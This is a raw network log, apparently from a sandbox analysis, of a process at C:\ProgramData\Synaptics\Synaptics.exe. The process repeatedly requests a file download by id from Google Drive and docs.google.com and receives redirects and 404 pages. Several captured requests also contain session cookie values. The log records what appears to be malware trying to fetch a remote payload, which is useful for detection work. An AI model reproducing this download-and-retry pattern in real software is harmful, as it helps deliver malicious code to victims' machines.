                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:55 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-2iwIFHP1zoMStDRsI4PsMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.6 | 49945 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:40:55 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
2024-12-30 10:40:55 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC6sXiif5GL6JjzU04Yp6gARQa5-yIxMq3l4odgVdA9uNTxAL52wtHHDyjd7Odi89lVBhmj_9XI
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:55 GMT
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-hosNYiIhRYXnivuXG93jxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
2024-12-30 10:40:55 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:40:55 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="L_E1Htsgwz4R8X06cq3-SQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:40:55 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.6 | 49955 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:40:56 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
2024-12-30 10:40:56 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:56 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-BgJKzrYVe05FU6up-XTnjg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      62 | 192.168.2.6 | 49956 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:56 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                                                                                                                      2024-12-30 10:40:56 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:56 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-LkZlDyeuh71nfBFD6-Z9yQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      63 | 192.168.2.6 | 49958 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:56 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:56 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC4bYkTwNeCxPGp_3BhGc8ZU7DOExsdp1IJnRu92qe5Km7VW2QoWcDgcjCxUbhqLjseFfQwBzuY
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:56 GMT
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-u_yJCVKGR0Bue4MeWV9Jxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:56 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:40:56 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="5XL7Fcf_j-rSpe30fO51xw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:40:56 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      64 | 192.168.2.6 | 49957 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:56 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:57 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC78R_9SfpG1mtwdjUV-eg6feTIyisWy8tOGMQcE0WvK7eWQIg9JmQABwCfbf-EGA4t2
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:56 GMT
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-88wrk4mwz5woJIo30CSorw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:57 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:40:57 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="meIxtuzl3CVwmZvryPCp5g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:40:57 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      65 | 192.168.2.6 | 49968 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:57 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:57 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:57 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-FU1oq01ogPNEBV5QZerPGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      66 | 192.168.2.6 | 49967 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:57 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      67 | 192.168.2.6 | 49969 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:57 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      68 | 192.168.2.6 | 49970 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:57 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      69 | 192.168.2.6 | 49978 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:58 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:58 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:58 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-HQ-9PSNXkD6sVcWwW8KCEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      70 | 192.168.2.6 | 49979 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:58 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:58 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:58 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-xxi5fpEPjp-9MdTebHRT6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      71 | 192.168.2.6 | 49980 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:58 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
